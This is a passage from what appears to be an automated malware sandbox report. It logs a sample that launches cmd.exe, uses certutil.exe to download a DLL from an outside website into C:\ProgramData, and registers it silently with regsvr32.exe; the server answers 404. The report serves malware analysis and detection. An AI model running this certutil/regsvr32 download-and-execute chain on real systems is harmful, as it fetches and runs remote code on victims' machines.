2021-09-15 11:47:29 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.449773100.26.95.170443C:\Windows\SysWOW64\certutil.exe
TimestampkBytes transferredDirectionData
2021-09-15 11:47:31 UTC0OUTGET /volunteer/actXApiLib.dll HTTP/1.1
Accept: */*
User-Agent: CertUtil URL Agent
Host: www.christchurchmvl.org
Cache-Control: no-cache
2021-09-15 11:47:31 UTC0INHTTP/1.1 404 Not Found
Date: Wed, 15 Sep 2021 11:47:31 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
2021-09-15 11:47:31 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: cBQPecnQRp.exe PID: 5760 Parent PID: 5368

General

Start time:13:46:42
Start date:15/09/2021
Path:C:\Users\user\Desktop\cBQPecnQRp.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\cBQPecnQRp.exe'
Imagebase:0x400000
File size:1363448 bytes
MD5 hash:53817315B195E328CCC0F56B15B247C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Analysis Process: cmd.exe PID: 6152 Parent PID: 5760

General

Start time:13:47:24
Start date:15/09/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\cmd.exe
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Analysis Process: conhost.exe PID: 1368 Parent PID: 6152

General

Start time:13:47:25
Start date:15/09/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Analysis Process: certutil.exe PID: 4528 Parent PID: 6152

General

Start time:13:47:26
Start date:15/09/2021
Path:C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit):true
Commandline:certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Imagebase:0x10a0000
File size:1273856 bytes
MD5 hash:D056DF596F6E02A36841E69872AEF7BD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Analysis Process: regsvr32.exe PID: 5340 Parent PID: 6152

General

Start time:13:47:32
Start date:15/09/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Imagebase:0x1370000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

Reset < >